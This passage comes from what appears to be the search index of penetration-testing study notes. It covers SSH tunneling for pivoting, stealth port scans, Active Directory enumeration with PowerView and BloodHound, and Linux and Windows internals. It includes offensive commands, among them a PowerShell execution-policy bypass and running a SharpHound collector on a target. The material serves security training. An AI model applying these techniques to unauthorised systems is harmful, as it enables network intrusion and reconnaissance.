Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"218","title":"Introduction"},"219":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? 
This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"219","title":"Local Port Forwarding"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. 
It is not possible to distinguish an open from a filtered port with these scans, hence why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"220","title":"Remote Port Forwarding"},"221":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"221","title":"Active Directory (AD)"},"222":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. 
Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"222","title":"Overview"},"223":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"223","title":"Get Domain Information"},"224":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"224","title":"Get Domain Controller Information"},"225":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"225","title":"Retrieve Domain Policy Information"},"226":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"226","title":"Get Users Information"},"227":{"body":"Get a specific properties of all the users: Get-DomainUser -Properties ,,... 
It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"227","title":"Get User Property Information"},"228":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"228","title":"Get Domain Machines"},"229":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"229","title":"Get Groups"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"230","title":"Get Group Policy Information"},"231":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"231","title":"Additional Resources"},"232":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. 
Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"232","title":"Overview"},"233":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"233","title":"Setup"},"234":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"234","title":"Collecting Data for Bloodhound"},"235":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"235","title":"Viewing the Data"},"236":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. 
Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"236","title":"Finding Relationships in the Data"},"237":{"body":"","breadcrumbs":"System Internals","id":"237","title":"System Internals"},"238":{"body":"","breadcrumbs":"System Internals » Linux","id":"238","title":"System Internals"},"239":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"239","title":"User ID"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"240","title":"Unified File System"},"241":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. 
Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"241","title":"Symbolic Links"},"242":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just directory entries which reference the same inode, and therefore the same data, as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"242","title":"Hard Links"},"243":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are three possible types of permissions - read (r), write (w) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. 
Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"243","title":"Permissions"},"244":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"244","title":"Set Owner User ID (SUID)"},"245":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way as SUID, but rather than the files executing with the privileges of the owning user, they execute with the effective GID of the owning group. When set on a directory, any file created within that directory will automatically have its group ownership set to the group owning the directory rather than the primary group of the creating user. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"245","title":"Set Group ID (SGID)"},"246":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. 
It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"246","title":"Sticky Bit"},"247":{"body":"The command line, is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"247","title":"Introduction"},"248":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. > err_file Redirect the command's standard error into err_file by overwriting it. >> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"248","title":"Input and Output Redirection"},"249":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"249","title":"Pipes"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"","breadcrumbs":"System Internals » Windows","id":"250","title":"System Internals"},"251":{"body":"Active Directory (AD) is a directory service for Windows network environments. 
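To tie the three special bits together from an attacker's point of view, here is an added example script (not from the original notes) that decodes an ls -l mode string and sweeps a tree for SUID/SGID executables and world-writable paths. It separates world-writable directories with the sticky bit (such as /tmp) from those without, because in the latter any user can delete or replace other users' files. The labels it prints are my own.

```bash
#!/bin/sh
# Enumerate the special permission bits (SUID, SGID, sticky) and world-writable paths.
# Added example, not part of the original notes; the output labels are my own.

tag() {  # prefix every input line with a kind label and a tab
  while IFS= read -r f; do printf '%s\t%s\n' "$1" "$f"; done
}

# Interpret the 10-character mode string that ls -l prints, e.g. -rwsr-xr-x.
# An upper-case S or T means the bit is set but the matching execute bit is not.
describe_mode() {
  m=${1%[.+@]}   # drop the ACL/SELinux marker some ls builds append
  out=""
  case $m in ???[sS]*)      out="$out suid" ;; esac            # owner execute slot
  case $m in ??????[sS]*)   out="$out sgid" ;; esac            # group execute slot
  case $m in ?????????[tT]) out="$out sticky" ;; esac          # others execute slot
  case $m in ????????w?)    out="$out world-writable" ;; esac  # others write slot
  printf '%s\n' "${out# }"
}

# Walk a tree (default: /) and list what is worth a closer look:
#   suid / sgid       executables that run with the owner's / group's identity
#   ww-file           files any user may modify (root cron scripts, configs, ...)
#   ww-dir-nosticky   directories where any user may delete or replace others' files
#   ww-dir-sticky     world-writable but protected by the sticky bit (e.g. /tmp)
find_special_perms() {
  root=${1:-/}
  find "$root" -xdev -type f -perm -4000 2>/dev/null | tag suid
  find "$root" -xdev -type f -perm -2000 2>/dev/null | tag sgid
  find "$root" -xdev -type f -perm -0002 2>/dev/null | tag ww-file
  find "$root" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null | tag ww-dir-nosticky
  find "$root" -xdev -type d -perm -0002 -perm -1000 2>/dev/null | tag ww-dir-sticky
}

if [ -n "${1:-}" ]; then find_special_perms "$1"; fi   # e.g. ./perms.sh /
```

The -perm -MODE form matches when all of the given bits are set, so -perm -4000 finds every SUID file regardless of its other permissions; -xdev keeps the sweep on one file system so that /proc and network mounts are not traversed.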
It allows an organisation to store directory data and make it available to the users in a given network. AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Introduction","id":"251","title":"Introduction"},"252":{"body":"Resources in Active Directory are represented by objects. An object is any resource present within Active Directory such as OUs, printers, users, domain controllers, etc. Every object has a set of characteristic attributes which describe it. For example, a computer object has attributes such as hostname and DNS name. Additionally, all AD attributes are associated with an LDAP name which can be used when performing LDAP queries. Every object carries information in these attributes, some of which are mandatory and some optional. Objects can be instantiated with a predefined set of attributes from a class in order to make the process of object creation easier. For example, the computer object PC1 will be an instance of the computer class in Active Directory. It is common for objects to contain other objects, in which case they are called containers . An object holding no other objects is known as a leaf .","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Objects","id":"252","title":"Objects"},"253":{"body":"Objects are organised in logical groups called domains . 
These can further have nested subdomains in them and can either operate independently or be linked to other domains via trust relationships. A root domain together with all of its subdomains and nested objects is known as a tree . A collection of trees is referred to as a forest (really???). It is the root container for all objects in a given AD environment. Following is an example forest with a single tree: COMPANY.LOCAL/\n├─ ADMIN.COMPANY.LOCAL\n│ ├─ GPOs\n│ ├─ OUs\n│ │ ├─ EMPLOYEES\n│ │ │ ├─ COMPUTERS\n│ │ │ │ ├─ PC1\n│ │ │ ├─ USERS\n│ │ │ │ ├─ jdoe\n│ │ │ ├─ GROUPS\n│ │ │ │ ├─ STAFF\n├─ DEV.COMPANY.LOCAL\n├─ MAIL.COMPANY.LOCAL","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Object Organisation","id":"253","title":"Object Organisation"},"254":{"body":"The full path to an object in AD is specified via a Distinguished Name (DN) . A Relative Distinguished Name (RDN) is a single component of the DN that separates the object from other objects at the current level in the naming hierarchy. RDNs are represented as attribute-value pairs in the form attribute=value, typically expressed in UTF-8. A DN is simply a comma-separated list of RDNs which begins with the object's own RDN (the most specific component) on the left and works its way up the hierarchy, ending with the domain components on the right. For example, the DN for the John Doe user would be cn=jdoe,ou=users,ou=employees,dc=admin,dc=company,dc=local. 
The following attribute names for RDNs are defined: LDAP Name Attribute DC domainComponent CN commonName OU organizationalUnitName O organizationName STREET streetAddress L localityName ST stateOrProvinceName C countryName UID userid It is also important to note that the following characters are special and need to be escaped by a \\ if they appear in the attribute value: Character Description space or # at the beginning of a string space at the end of a string , comma + plus sign \" double quotes \\ backslash / forward slash < left angle bracket > right angle bracket ; semicolon LF line feed CR carriage return = equals sign","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Distinguished Name (DN) & Relative Distinguished Name (RDN)","id":"254","title":"Distinguished Name (DN) & Relative Distinguished Name (RDN)"},"255":{"body":"Trusts in Active Directory allow for forest-forest or domain-domain links. They allow users in one domain to access resources in another domain where their account does not reside. The way they work is by linking the authentication systems between two domains. The two parties in a trust do not necessarily have the same capabilities with respect to each other: One-way trusts allow only one party to access the resources of the other. The trusted domain is considered the one accessing the resources and the trusting domain is the one providing them. Two-way trusts allow the parties to mutually access each other's resources. Additionally, trusts can either be transitive or non-transitive. Transitivity means that the trust relationship is propagated upwards through a domain tree as it is formed. For example, a transitive two-way trust is established between a new domain and its parent domain upon creation. Any children of the new domain (grandchildren of the parent domain) will also then share a trust relationship with the master parent. 
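As an added example, not part of the original notes, the following shell functions build a DN from a domain name, an OU path and a CN, escaping RDN values as the table above requires. They show the ordering concretely: the CN comes first, the OUs follow from the innermost outwards and the domain components come last, so the John Doe user from the example ends up as CN=jdoe,OU=users,OU=employees,DC=admin,DC=company,DC=local. The argument layout (domain, top-down OU path, CN) is an assumption for illustration; embedded line breaks are not escaped because sed works one line at a time.

```bash
#!/bin/sh
# Build an AD distinguished name from its parts, escaping RDN values.
# Added example, not from the original notes; the argument layout is an assumption.

# Escape one RDN attribute value: backslash first (so later escapes are not doubled),
# then the special characters, then a trailing space, then a leading space or '#'.
escape_rdn_value() {
  printf '%s' "$1" | sed \
    -e 's/\\/\\\\/g' \
    -e 's|[,+"<>;=/]|\\&|g' \
    -e 's/ $/\\ /' \
    -e 's/^\([ #]\)/\\\1/'
}

# build_dn <dns-domain> <ou-path> <cn>
# ou-path is written top-down with '/' separators (e.g. employees/users). The DN
# lists components most specific first, so the OUs are emitted in reverse and the
# domain components, one per DNS label, come last.
build_dn() {
  dn="CN=$(escape_rdn_value "$3")"
  ous=$(printf '%s\n' "$2" | tr '/' '\n' | sed '1!G;h;$!d')   # reverse the lines
  while IFS= read -r ou; do
    if [ -n "$ou" ]; then dn="$dn,OU=$(escape_rdn_value "$ou")"; fi
  done <<EOF
$ous
EOF
  old_ifs=$IFS; IFS=.
  for dc in $1; do dn="$dn,DC=$(escape_rdn_value "$dc")"; done
  IFS=$old_ifs
  printf '%s\n' "$dn"
}

if [ $# -eq 3 ]; then build_dn "$1" "$2" "$3"; fi   # e.g. ./dn.sh admin.company.local employees/users jdoe
```

A DN built this way can be pasted straight into an LDAP filter or a PowerView -SearchBase argument; getting the escaping wrong on a CN such as "Doe, John" is a common reason such queries silently return nothing.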
Five possible types of trusts can be discerned depending on the relationships between the systems being linked: Trust Description Parent-child A two-way transitive relationship between a parent and a child domain. Cross-link A trust between two child domains at the same hierarchical level, which is used to speed up authentication. External A non-transitive trust between two separate domains in separate forests which are not already linked by a forest trust. Tree-root A two-way transitive trust between a forest root domain and a new tree root domain. Forest A transitive trust between two forest root domains in separate forests.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Trusts","id":"255","title":"Trusts"},"256":{"body":"A contact in AD contains information about an external person or company that may need to be contacted on a regular basis. Contact objects are instances of the Contact class and are considered leaf objects. Their attributes include first name, last name, email address, telephone number, etc. Contacts are not security principals - they lack a SID and only have a GUID.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Contacts » Introduction","id":"256","title":"Introduction"},"257":{"body":"Security Principal - any object which can be authenticated by the operating system, such as user or computer accounts, or a thread/process running in the security context of a user or computer account, or the security groups for these accounts. Security Identifier (SID) - a unique identifier which identifies a security principal/group. Every security principal has its own unique SID, which is issued by the domain controller and stored in a security database.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Terminology","id":"257","title":"System Internals"},"258":{"body":"A user in AD stores information about an employee or contractor who works for the organisation. 
These objects are instances of the User class . User objects are leaf objects, since they do not contain any other objects. Every user is considered a security principal and has its own SID and GUID. Additionally, user objects can have numerous different attributes such as display name, email address, last login time, etc - well in excess of 800.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Introduction","id":"258","title":"Introduction"},"259":{"body":"Domain Users in AD are the ones who are capable of accessing resources in the Active Directory environment. These users can log into any host on the network. All domain users have 5 essential naming attributes as well as many others: Attribute Description UserPrincipalName (UPN) The primary logon name for the user, which uses the user's email by convention. ObjectGUID A unique identifier for the user which is never changed even after removal of the user. SAMAccountName A logon name providing support for previous versions of Windows. objectSID The user's security identifier (SID) which identifies the user and their group memberships. sIDHistory A history of the user's SIDs which keeps track of the SIDs for the user when they migrate from one domain to another.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Users » Domain Users","id":"259","title":"Domain Users"},"26":{"body":"Web servers usually run on port 80 or 443 depending on whether they run HTTP or HTTPS. Version information about the underlying web server application can be obtained via nmap using the -sV option. 
nmap -p80,443 -sV We can also use the http-enum NSE script which will perform some basic web server enumeration for us: nmap -p80 --script=http-enum Note Web servers are also commonly set up on custom ports, but one can enumerate those in the same way.","breadcrumbs":"Reconnaissance » Enumeration » Web Server Enumeration (80, 443) » Obtaining Version Information","id":"26","title":"Obtaining Version Information"},"260":{"body":"Groups are instances of the AD Group class. They provide the means to mass assign permissions to users, making administration a lot easier. The administrator assigns a set of privileges to the group and they will be inherited by any user who joins it. Groups have two essential characteristics - type and scope.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Introduction","id":"260","title":"Introduction"},"261":{"body":"The group type identifies the group's purpose and must be chosen upon creation of the group. There are two types of groups. Security groups are best suited precisely for the purpose described above - mass assignment of permissions to users. Distribution groups are a bit different - they are unable to assign any permissions and are really only used by email applications for the distribution of messages to their members. They resemble mailing lists and can be auto-filled in the recipient field when sending emails using Microsoft Outlook.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Type","id":"261","title":"Group Type"},"262":{"body":"There are three possible group scopes and, once again, one must be selected upon creation of the group. The group scope determines where the group can be granted permissions and who can be a member of it. Domain Local groups can only be used to manage permissions on resources within the domain that the group belongs to. Whilst such groups cannot be used in other domains, they can contain users from other domains. 
Additionally, nesting of domain local groups is allowed within other domain local groups but not within global ones. Global groups can be granted access to resources in a different domain from the one they belong to, although they may only contain users from their origin domain. Nesting of global groups is allowed both in other global groups and in domain local groups. Universal groups allow permissions management across all domains within the same forest. Their membership is stored in the Global Catalog and any change made directly to them triggers forest-wide replication. To avoid unnecessary replication, administrators are advised to keep users and computers in global groups which are themselves members of universal groups. It is also possible to change the scope of a group under certain conditions: A global group can be promoted to a universal group if it is not a member of another global group. A domain local group can be promoted to a universal group if it does not contain any other domain local groups. A universal group can be demoted to a global group if it does not contain any other universal groups. A universal group can be freely demoted to a domain local group.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Group Scope","id":"262","title":"Group Scope"},"263":{"body":"Some built-in groups are automatically created when an AD environment is set up. These groups have specific purposes; the ones living in the Builtin container have a fixed domain local scope which cannot be changed (they can still contain other groups - Domain Admins, for instance, is a member of Administrators). Group Name Description Account Operators Management of most account types with the exception of the Administrator account, administrative user accounts, or members of the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Additionally, members can log in locally to domain controllers. Administrators Full access to a computer or an entire domain provided that they are in this group on a domain controller. 
Backup Operators Ability to back up or restore all files on a computer, irrespective of the permissions set on it; ability to log on and shut down the computer; ability to log on domain controllers locally; ability to make shadow copies of SAM/NTDS databases. DnsAdmins Access to DNS network information. Only created if the DNS server role is installed at some point on a domain controller. Domain Admins Full permissions to administer the domain; local administrators on every domain-joined machine. Domain Computers Stores all computers which are not domain controllers. Domain Controllers Stores all domain controllers in the domain. Domain Guests Includes the built-in Guest account. Domain Users Stores all users in the domain. Enterprise Admins Complete configuration access within the domain; ability to make forest-wide changes such as creating child domains and trusts; only exists in root domains. Event Log Readers Ability to read event logs on local computers. Group Policy Creator Owners Management of GPOs in the domain. Hyper-V Administrators Complete access to all Hyper-V features. IIS_IUSRS Used by IIS. Pre–Windows 2000 Compatible Access Provides backwards-compatibility with Windows NT 4.0 or earlier. Print Operators Printer management; ability to log on to DCs and load printer drivers. Protected Users Provides additional protection against attacks such as credential theft or Kerberoasting. Read-Only Domain Controllers Contains all read-only DCs in the domain. Remote Desktop Users Ability to connect to a host via RDP. Remote Management Users Schema Admins Ability to modify the AD schema. Server Operators Ability to modify services, SMB shares and backup files on domain controllers.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Groups » Default Groups","id":"263","title":"Default Groups"},"264":{"body":"Domain Controllers (DCs) are at the heart of Active Directory. 
There are five Flexible Single Master Operation (FSMO) roles which can be assigned separately to domain controllers in order to avoid conflicts when data is updated in the AD environment. The first two are forest-wide (held by exactly one DC in the whole forest), the remaining three are per-domain (held by one DC in each domain). These roles are the following: Role Description Schema Master Management of the AD schema. Domain Naming Master Management of domain names - ensures that no two domains in the same forest share the same name. Relative ID (RID) Master Assignment of RID pools to the other DCs within the domain, which helps to ensure that no two objects share the same SID. PDC Emulator The authoritative DC in the domain - responds to authentication requests, receives password changes first and manages Group Policy Objects (GPOs). Additionally, it keeps track of time within the domain. Infrastructure Master Translation of GUIDs, SIDs, and DNs for objects which are referenced from other domains in the same forest.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Domain Controllers » Introduction","id":"264","title":"Introduction"},"265":{"body":"A computer object is an instance of the Computer class in Active Directory and represents a workstation or server connected to the AD network. Computer objects are security principals and therefore have both a SID and GUID. These are prime targets for adversaries, since code running with full administrative access on a domain-joined computer (NT AUTHORITY\\SYSTEM) authenticates to the domain as the machine account, which has privileges similar to those of a standard domain user and can be used to enumerate the AD environment.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » Computers » Introduction","id":"265","title":"Introduction"},"266":{"body":"Windows uses the New Technology File System (NTFS) for managing its files and folders. What makes it special is its ability to automatically repair files and folders on disk using log files in case of a failure. 
Additionally, it lifts certain limitations which were characteristic of its predecessors by supporting files larger than 4GB, being able to set permissions on specific files and folders and being able to avail itself of both compression and encryption. Another peculiar feature of NTFS are Alternate Data Streams .","breadcrumbs":"System Internals » Windows » File System » Introduction","id":"266","title":"Introduction"},"267":{"body":"NTFS allows for every user/group to have its own set of permissions on every file and folder in the file system tree. The following six types of permissions can be set: Permission On Files On Folders Read View or access the file's contents. View and list files and subfolders. Write Write to the file. Add files or subfolders. Read & Execute View or access the file's contents as well as execute the file. View and list files and subfolders as well as execute files. Inherited by both files and folders. List Folder Contents N/A View and list files and subfolders as well as execute files. Inherited only by folders. Modify Read and write to the file, or delete it. Read and write to files and subfolders, or delete the folder. Full Control Read, write, change or delete the file. 
Read, write, change or delete files and subfolders.","breadcrumbs":"System Internals » Windows » File System » Permissions","id":"267","title":"Permissions"},"268":{"body":"Permissions can be inspected from the command line by running icacls The last set of () for each user/group tell you the permissions: F - Full Control M - Modify RX - Read & Execute R - Read W - Write Additionally, the permissions on a file/folder can be inspected by right-clicking on the item in Windows Explorer, following Properties->Security and then selecting the user/group you want to see the permissions for.","breadcrumbs":"System Internals » Windows » File System » Inspecting Permissions","id":"268","title":"Inspecting Permissions"},"269":{"body":"A not very well-known, yet interesting feature of NTFS are the so-called Alternate Data Streams. These were implemented for better Macintosh file support, but they can lead to security vulnerabilities and ways to hide data. A data stream can be thought of as a file within another file. Each stream has its own allocated disk space, size and file locks. Moreover, alternate data streams are invisible to Windows Explorer which makes them an easy way to hide data within legitimately looking files. Every file in NTFS has at least one default data stream where its data is stored. The default data stream is innominate and any stream which does have a name is considered an alternate data stream.","breadcrumbs":"System Internals » Windows » File System » Alternate Data Streams (ADS)","id":"269","title":"Alternate Data Streams (ADS)"},"27":{"body":"This is the first step one needs to take after discovering a web application. The goal is to identify all publicly-accessible routes on the server such as files, directories and API endpoints. In order to do so, we can use various tools such as gobuster and feroxbuster . The technique works by sampling common file and directory names from a wordlist and then querying the server with these routes. 
